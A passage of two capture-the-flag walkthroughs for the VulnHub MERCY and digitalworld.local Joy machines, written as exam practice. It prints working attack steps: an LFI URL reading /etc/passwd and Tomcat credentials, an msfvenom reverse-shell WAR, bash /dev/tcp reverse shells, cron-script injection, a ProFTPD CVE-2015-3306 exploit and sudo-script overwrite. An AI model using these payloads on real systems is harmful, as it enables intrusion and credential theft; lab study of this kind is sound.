echo "For other details of MERCY, please contact your system administrator." >> config

chown qiu:qiu config

config (knockd parts of interest)

...

[openHTTP]
	sequence    = 159,27391,4
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 80 -j ACCEPT
	tcpflags    = syn

...

[openSSH]
	sequence    = 17301,28504,9999
	seq_timeout = 100
	command     = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags    = syn
...

Knock Knock

for port in 17301 28504 9999; do nc 10.88.42.132 $port; done
for port in 159 27391 4; do nc 10.88.42.132 $port; done

Enumerate Port 22

# Nmap 7.80 scan initiated Sun Jun 14 14:04:48 2020 as: nmap -sC -sV -oA nmap/nmap_port22tcp_10.88.42.132 -p22 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00056s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 93:64:02:58:62:0e:e7:85:50:d9:97:ea:8d:01:68:f6 (DSA)
|   2048 13:77:33:9a:49:c0:51:dc:8f:fb:c8:33:17:b2:05:71 (RSA)
|   256 a2:25:3c:cf:ac:d7:0f:ae:2e:8c:c5:14:c4:65:c1:59 (ECDSA)
|_  256 33:12:1b:6a:98:da:ea:9d:8c:09:94:ed:44:8d:4e:5b (ED25519)
MAC Address: 00:0C:29:67:71:C0 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:04:48 2020 -- 1 IP address (1 host up) scanned in 0.74 seconds

There is nothing special there, other than knowing it is Ubuntu, so at least we can discern file paths (for later).

I tried the qiu login, and it didn’t work for SSH.

Port 80

Enumerate

# Nmap 7.80 scan initiated Sun Jun 14 14:02:07 2020 as: nmap -sC -sV -oA nmap/nmap_port80tcp_10.88.42.132 -p80 10.88.42.132
Nmap scan report for 10.88.42.132
Host is up (0.00065s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/mercy /nomercy
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:67:71:C0 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 14 14:02:14 2020 -- 1 IP address (1 host up) scanned in 6.73 seconds

Nmap found the robots.txt file and showed the contents. Let’s look at it more.

robots.txt

User-agent: *
Disallow: /mercy
Disallow: /nomercy

Port 80 – /mercy

Welcome to Mercy!

We hope you do not plead for mercy too much. If you do, please help us upgrade our website to allow our visitors to obtain more than just the local time of our system.

I made a mental note of that. It rang a bell later.

Port 80 – /nomercy

It is running RIPS 0.53. So what is the first thing I should do when I find a web app with a version I never heard of… well, I do searchsploit.

There’s an LFI. The LFI also works.

http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd

Or to grab it with the garbage removed.

wget -q -O- http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/passwd | awk -F'? ' '{print $2}'
...
pleadformercy:x:1000:1000:pleadformercy:/home/pleadformercy:/bin/bash
qiu:x:1001:1001:qiu:/home/qiu:/bin/bash
thisisasuperduperlonguser:x:1002:1002:,,,:/home/thisisasuperduperlonguser:/bin/bash
fluffy:x:1003:1003::/home/fluffy:/bin/sh

Getting The Tomcat Configuration Files

I wasn’t sure where Ubuntu stored Tomcat files, so I looked it up. I found https://askubuntu.com/questions/135824/what-is-the-tomcat-installation-directory, and I am now looking for these files.

/etc/tomcat7/server.xml
/etc/tomcat7/tomcat-users.xml
/etc/tomcat7/web.xml
/etc/tomcat7/catalina.properties

So I grabbed them all and saved them locally, and converted the HTML entities back to ASCII.

for file in server.xml tomcat-users.xml web.xml catalina.properties; do wget -q -O- http://10.88.42.132/nomercy/windows/code.php?file=../../../../../../etc/tomcat7/$file | awk -F'? ' '{print $2}' | sed -e 's/&quot;/"/g' -e 's/&gt;/>/g' -e 's/&lt;/</g' > $file ; done

With some logins found and the admin/manager was in it.

thisisasuperduperlonguser:heartbreakisinevitable
fluffy:freakishfluffybunny

Now that we have to Tomcat admin login, time to try to log in with it.

Port 8080 – Tomcat Revisited

thisisasuperduperlonguser:heartbreakisinevitable (Tomcat admin/manager)
fluffy:freakishfluffybunny (Tomcat normal, no access)

Logging in works for thisisasuperduperlonguser:heartbreakisinevitable.

Now time to get our reverse shell. The common thing to do is to use msfvenom to build a .war file, upload the war in the admin/manager interface, and then browse to the uploaded application, which pops a reverse shell.

Generate the reverse shell .war file

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.88.42.133 LPORT=4444 -f war > sogwtf.war

Start a netcat listener

nc -lvnp 4444

Upload the war file

WAR file to deploy Select WAR file to upload Locate .war and deploy No file selected. Deploy

Spawn reverse shell

click me Stop Start Expire sessions Reload with idle 30 Undeploy minutes

Gain Access To The Machine And Pivot To fluffy

The only other creds I have are for fluffy, so su to that user, and look around.

timeclock Script

#!/bin/bash 

now=$(date) 
echo "The system time is: $now." > ../../../../../var/www/html/time 
echo "Time check courtesy of LINUX" >> ../../../../../var/www/html/time 
chown www-data:www-data ../../../../../var/www/html/time

An interesting script. It ties together with the port 80 /mercy clue. I didn’t look further and honed in on this. Instead, I checked the timestamp on the time file and checked if fluffy’s crontab was doing it. The file was recently updated, and fluffy didn’t have a crontab. So, I assumed it was root or pleadformercy (with elevated perms to do the chown).

So, I worked to get another reverse shell!

I tested to see if I could get a reverse shell as with nc.

[email protected]:~/.private/secrets$ nc -e /bin/bash 10.88.42.133 9000
nc -e /bin/bash 10.88.42.133 9000
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
          [-P proxy_username] [-p source_port] [-q seconds] [-s source]
          [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
          [-x proxy_address[:port]] [destination] [port]
[email protected]:~/.private/secrets$

I pulled up the trusty pentestmoney reverse shell cheat sheet at http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to get the bash syntax or the other nc one with pipes. The bash one worked!

bash -i >& /dev/tcp/10.88.42.133/9000 0>&1

Getting The root Shell

echo 'bash -i >& /dev/tcp/10.88.42.133/9000 0>&1' >> timeclock

And root shell popped!

Get The Flags

Digitalworld Joy VulnHub Walkthrough

Note: this post was originally posted on another blog I had in June 2020, and I worked through this VulnHub machine to fix my enumeration and note-taking abilities after failing the OSCP exam the second time.


Digitalworld.local Joy https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

This machine would have been much more complicated if not for enumeration. Most of the work was getting the initial shell, and after that, the box fell quickly.

I learned that if I find a vulnerability with a public exploit, calm down, take note of it, and keep enumerating because there could be more exploits (more reliable/easy). For example, I wasted a lot more time on dropbear ssh exploit than I should have.

Flow

  1. Enumerate ports and versions
  2. Download all FTP content
  3. Waste time trying to exploit dropbear ssh
  4. Proftpd allows CPFR and CPTO, but exploit needs the web directory (it isn’t default)
  5. Download patrick’s files via TFTP, discovered by SNMP (also possible to download via with the CPFR and CPTO trick, will show both)
  6. Discover web directory from patrick’s files and use proftpd exploit to get a web RCE
  7. Get a reverse shell via RCE
  8. Find patrick’s password and su to patrick
  9. Replace sudo script with CPFR/CPTO trick and get a root shell
  10. Get flag

Initial Enumeration

Nmap – TCP Ports

nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 07:54:40 2020 as: nmap -sC -sV -p- -oA nmap/nmap_tcp 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00046s latency).
Not shown: 65523 closed ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         ProFTPD 1.2.10
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x   2 ftp      ftp          4096 Jan  6  2019 download
|_drwxrwxr-x   2 ftp      ftp          4096 Jan 10  2019 upload
22/tcp  open  ssh         Dropbear sshd 0.34 (protocol 2.0)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25
| http-ls: Volume /
| SIZE  TIME              FILENAME
| -     2016-07-19 20:03  ossec/
|_
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL TOP CAPA STLS AUTH-RESP-CODE UIDL RESP-CODES
|_ssl-date: TLS randomness does not represent time
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: OK LITERAL+ IMAP4rev1 have ENABLE ID more IDLE post-login listed SASL-IR capabilities Pre-login STARTTLS LOGINDISABLEDA0001 LOGIN-REFERRALS
|_ssl-date: TLS randomness does not represent time
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
587/tcp open  smtp        Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, 
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Not valid before: 2018-12-23T14:29:24
|_Not valid after:  2028-12-20T14:29:24
|_ssl-date: TLS randomness does not represent time
993/tcp open  ssl/imaps?
|_ssl-date: TLS randomness does not represent time
995/tcp open  ssl/pop3s?
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:32:A4:6A (VMware)
Service Info: Hosts: The,  JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: JOY, NetBIOS user: , NetBIOS MAC:  (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.5.16-Debian) | Computer name: joy | NetBIOS computer name: JOY\x00 | Domain name: \x00 | FQDN: joy |_ System time: 2020-06-16T19:54:56+08:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-06-16T11:54:56 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Tue Jun 16 07:57:41 2020 -- 1 IP address (1 host up) scanned in 181.15 seconds

Nmap – UDP Ports

SNMP conveniently displays a process listing, netstat info, and installed packages. In addition, it shows TFTP service running on port 36969 that’s serving patrick’s home directory. I truncated the Nmap output a lot to show that.

nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000  10.88.42.136
# Nmap 7.80 scan initiated Tue Jun 16 08:06:13 2020 as: nmap -sU -sC -sV -p 1-1000 -oA nmap/nmap_udp_1-1000 10.88.42.136
Nmap scan report for 10.88.42.136
Host is up (0.00069s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
123/udp open ntp NTP v4 (secondary server)
| ntp-info: 
|_ 
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: WORKGROUP)
138/udp open|filtered netbios-dgm
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info: 
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: d1785e76ec962f5c00000000
| snmpEngineBoots: 29
|_ snmpEngineTime: 44m11s
| snmp-interfaces: 
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Traffic stats: 5.31 Kb sent, 5.31 Kb received
| Intel Corporation 82545EM Gigabit Ethernet Controller (Copper)
| IP address: 10.88.42.136 Netmask: 255.255.255.0
| MAC address: 00:0c:29:32:a4:6a (VMware)
| Type: ethernetCsmacd Speed: 1 Gbps
|_ Traffic stats: 89.38 Mb sent, 241.11 Mb received
| snmp-netstat: 
| TCP 0.0.0.0:21 0.0.0.0:0
| TCP 0.0.0.0:22 0.0.0.0:0
| TCP 0.0.0.0:25 0.0.0.0:0
| TCP 0.0.0.0:110 0.0.0.0:0
| TCP 0.0.0.0:139 0.0.0.0:0
| TCP 0.0.0.0:143 0.0.0.0:0
| TCP 0.0.0.0:445 0.0.0.0:0
| TCP 0.0.0.0:465 0.0.0.0:0
| TCP 0.0.0.0:587 0.0.0.0:0
| TCP 0.0.0.0:993 0.0.0.0:0
| TCP 0.0.0.0:995 0.0.0.0:0
| TCP 127.0.0.1:631 0.0.0.0:0
| TCP 127.0.0.1:3306 0.0.0.0:0
| UDP 0.0.0.0:68 *:*
| UDP 0.0.0.0:123 *:*
| UDP 0.0.0.0:137 *:*
| UDP 0.0.0.0:138 *:*
| UDP 0.0.0.0:161 *:*
| UDP 0.0.0.0:631 *:*
| UDP 0.0.0.0:1900 *:*
| UDP 0.0.0.0:5353 *:*
| UDP 0.0.0.0:36969 *:*
| UDP 0.0.0.0:42070 *:*
| UDP 0.0.0.0:51704 *:*
| UDP 10.88.42.136:123 *:*
| UDP 10.88.42.136:137 *:*
| UDP 10.88.42.136:138 *:*
| UDP 10.88.42.255:137 *:*
| UDP 10.88.42.255:138 *:*
|_ UDP 127.0.0.1:123 *:*
| snmp-processes: 
...
| 754: 
| Name: in.tftpd
| Path: /usr/sbin/in.tftpd
| Params: --listen --user tftp --address 0.0.0.0:36969 --secure /home/patrick
...

FTP – Anonymous FTP

Since anonymous FTP is active and there are files to grab, I decided to grab them all. I’m not sure what the best tool is, but I’ve always used the lftp client to mirror FTP contents.

mkdir ftp
cd ftp
lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136

FTP – FILES

.
./download
./upload
./upload/project_yolo
./upload/project_malindo
./upload/project_woranto
./upload/project_flamingo
./upload/project_bravado
./upload/project_luyano
./upload/project_komodo
./upload/project_desperado
./upload/reminder
./upload/project_okacho
./upload/directory
./upload/project_toto
./upload/project_sicko
./upload/project_zoo
./upload/project_vivino
./upload/project_armadillo
./upload/project_polento
./upload/project_indigo
./upload/project_uno
./upload/project_emilio
./upload/project_ronaldinho

FTP – upload/directory

More confirmation that patrick is a user on the system. It also seems like this is /home/patrick (previously mentioned in the process listing via SNMP).

Patrick's Directory

total 128
drwxr-xr-x 18 patrick patrick 4096 Jun 16 20:10 .
drwxr-xr-x 4 root root 4096 Jan 6 2019 ..
-rw------- 1 patrick patrick 185 Jan 28 2019 .bash_history
-rw-r--r-- 1 patrick patrick 220 Dec 23 2018 .bash_logout
-rw-r--r-- 1 patrick patrick 3526 Dec 23 2018 .bashrc
drwx------ 7 patrick patrick 4096 Jan 10 2019 .cache
drwx------ 10 patrick patrick 4096 Dec 26 2018 .config
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Desktop
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Documents
drwxr-xr-x 3 patrick patrick 4096 Jan 6 2019 Downloads
drwx------ 3 patrick patrick 4096 Dec 26 2018 .gnupg
-rwxrwxrwx 1 patrick patrick 0 Jan 9 2019 haha
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:50 HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:45 IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt
-rw------- 1 patrick patrick 8532 Jan 28 2019 .ICEauthority
drwxr-xr-x 3 patrick patrick 4096 Dec 26 2018 .local
drwx------ 5 patrick patrick 4096 Dec 28 2018 .mozilla
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Music
drwxr-xr-x 2 patrick patrick 4096 Jan 8 2019 .nano
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:45 p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Pictures
-rw-r--r-- 1 patrick patrick 675 Dec 23 2018 .profile
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Public
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:05 qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:00 QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt
d--------- 2 root root 4096 Jan 9 2019 script
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:50 sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:05 soqjRoS2by1apdqTErDEQTspl2YuWgva.txt
drwx------ 2 patrick patrick 4096 Dec 26 2018 .ssh
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 Sun
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Templates
-rw-r--r-- 1 patrick patrick 0 Jan 6 2019 .txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:10 U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 19:55 u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt
-rw-r--r-- 1 patrick patrick 0 Jun 16 20:00 uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt
-rw-r--r-- 1 patrick patrick 407 Jan 27 2019 version_control
drwxr-xr-x 2 patrick patrick 4096 Dec 26 2018 Videos
-rw-r--r-- 1 patrick patrick 0 Jun 16 19:55 xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt
-rw-r--r-- 1 patrick patrick 24 Jun 16 20:10 ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt

You should know where the directory can be accessed.

Information of this Machine!
Linux JOY 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64 GNU/Linux

What I Did Before UDP Scan Finished

Dropbear SSH Exploit Attempt

I wasted too much time getting tunnel vision on trying to exploit dropbear ssh (there’s an old exploit I spent time trying to get to work). It ultimately wasn’t fruitful. There’s an entry in searchsploit for it (exploits/linux/remote/387.c).

ProFTPD Exploit Attempt

I spent time on a searchsploit provided exploit (exploits/linux/remote/36803.py), but it requires the web directory. I did learn about CPFR and CPTO commands. I should have tried to use them to get patrick’s files. I’ll show it after the TFTP method (likely the intended method).

What We Now Know

  • patrick is a system user
  • patrick’s home directory is /home/patrick
  • we have a list of patrick’s files that are likely in /home/patrick
  • TFTP is serving /home/patrick

TFTP – Getting Patrick’s Files

Now we need to grab each of patrick’s files from TFTP using the file list. Be sure to remove “.” and “..” from the list of files.

awk '/[0-9] /{print $9}' ftp/upload/directory > patrick_files.txt
# remove . and .. from patrick_files.txt
mkdir tftp
cd tftp
for file in `cat ../patrick_files.txt`; do echo -e "get $file\nquit\n"|tftp 10.88.42.136 36969; done
for i in *; do echo ">> $i <<" && cat $i; done
>> Desktop <<
>> Documents <<
>> Downloads <<
>> haha <<
>> HmjhT4RkfTh7RIMfqMJWMphRts7EwVJL.txt <<
>> IBrat9JjUMGHJtVsAUfc0CLW3LEP4M15.txt <<
>> Music <<
>> p2pIHflvQpgys7Io9W7E33H4uFmzwHJpPgViBOlLBHDxi0zqJcrZObfDqPBG6GQ5.txt <<
Patrick is hardworking!
>> Pictures <<
>> Public <<
>> qNdejbhnSVcWpNVgYQvrq52kACwqgDUiyvo8Q5JgTZ1dvHcHOGpzFuEqC387wCWx.txt <<
Patrick is hardworking!
>> QrHTw7iuO4JCToijShVuQMrFcReSv9YV435E3niEYbFmoT50vikNjbsKuqgPGWot.txt <<
Patrick is hardworking!
>> script <<
>> sh5lebDMlsOns3I7sF7mnHqj5zbuJv9EMc60nGmmUbJOv6tJrDzSRsvJNeoiB0el.txt <<
Patrick is hardworking!
>> soqjRoS2by1apdqTErDEQTspl2YuWgva.txt <<
>> Sun <<
>> Templates <<
>> U1wNlhsloNt2AHXJZPs9Xi0rIj0gmazP.txt <<
>> u42rsGynarnocbP6FwTiFmnwmLLiHcCQTitVqbHnYYX28K4t43oqp3vjXdSQdbeQ.txt <<
Patrick is hardworking!
>> uxXpvjuUYMGKvOEDaCFfUFhTmvcvWcm0.txt <<
>> version_control <<
Version Control of External-Facing Services:

Apache: 2.4.25
Dropbear SSH: 0.34
ProFTPd: 1.3.5
Samba: 4.5.12

We should switch to OpenSSH and upgrade ProFTPd.

Note that we have some other configurations in this machine.
1. The webroot is no longer /var/www/html. We have changed it to /var/www/tryingharderisjoy.
2. I am trying to perform some simple bash scripting tutorials. Let me see how it turns out.
>> Videos <<
>> x86_64 <<
>> xXATmw8ZuarOVbYrxznrcKrPJdYRchUI.txt <<
>> ZxjEw0BVqBxx4KpJ4oDwRvOUbrRVYh8H50OIZyAE47jdGvuBFbIr25hTqvFg1cbL.txt <<
Patrick is hardworking!

FTP – Getting Patrick’s Files

We can use the CPFR and CPTO trick to put patrick’s files in the upload directory. Be sure to remove . and .. from the file list, or you could fill up the hard disk (yes, I did it). This takes some guesswork if you don’t know where the FTP directory is, but I guessed/knew it was /home/ftp.

for file in `cat patrick_files.txt`; do echo -e "site cpfr /home/patrick/$file\nsite cpto /home/ftp/upload/$file\nquit"|nc 10.88.42.136 21; done
cd ftp && lftp -u anonymous,anonymous -e 'mirror;quit' 10.88.42.136; cd -

Exploiting ProFTPD

We now know the web directory is /var/www/tryingharderisjoy, which is the last piece of information we needed to try to exploit for proftpd.

I tried the exploit in searchsploit, but it didn’t work. So I went looking on the web and found https://github.com/t0kx/exploit-CVE-2015-3306/, which works!

[18:10:35]🔥root[ /home/kali/VulnHub/joy ]# python3 exploit.py 
usage: exploit.py [-h] --host HOST --port PORT --path PATH
exploit.py: error: the following arguments are required: --host, --port, --path
[18:10:40]🔴->2 root[ /home/kali/VulnHub/joy ]# python3 exploit.py --host 10.88.42.136 --port 21 --path /var/www/tryingharderisjoy
[+] CVE-2015-3306 exploit by t0kx
[+] Exploiting 10.88.42.136:21
[+] Target exploited, acessing shell at http://10.88.42.136/backdoor.php
[+] Running whoami: www-data
[+] Done
[18:11:30]🔥root[ /home/kali/VulnHub/joy ]#
http://10.88.42.136/backdoor.php?cmd=COMMAND_HERE

“which nc” returns nothing, so netcat isn’t installed. So, I went back to http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet to see the reverse shell options again.

I tried the bash one, and it didn’t work. So I went to CyberChef to url encode the bash reverse shell.

I tried the PHP one (since I know PHP is installed), and it did work. I also went to CyberChef to url encode the PHP reverse shell.

Digitalworld local joy initialshell

Pivot to the Patrick User

Looking around, the ossec directory is there, so I looked inside of it. There’s a suspect file, “patricksecretsofjoy,” and it contains patrick’s password.

[email protected]:/var/www/tryingharderisjoy/ossec$ cat patricksecretsofjoy 
cat patricksecretsofjoy
credentials for JOY:
patrick:apollo098765
root:howtheheckdoiknowwhattherootpasswordis

how would these hack3rs ever find such a page?
[email protected]:/var/www/tryingharderisjoy/ossec$
patrick:apollo098765

I tried to ssh in, but that didn’t work.

[email protected]:~$ ssh [email protected]
Unable to negotiate with 10.88.42.136 port 22: no matching key exchange method found. Their offer: diffie-hellman-group1-sha1

I could, fortunately, su to patrick.

Digitalworld local joy supatrick

Pivot to Root

There’s a sudo command that uses a custom command. Unfortunately, I couldn’t edit or read the file directly.

Digitalworld local joy patricksudo

But I could replace its contents using the FTP CPFR/CPTO trick from earlier.

cd /dev/shm
echo -e '#!/bin/sh\nsh\n'>test
chmod +x test
echo -e "site cpfr /dev/shm/test\nsite cpto /home/patrick/script/test\nquit"|nc 10.88.42.136 21

Then I ran the sudo command and got a root shell.

Digitalworld local joy patricksudotoroot

Flag

Digitalworld local joy rootflag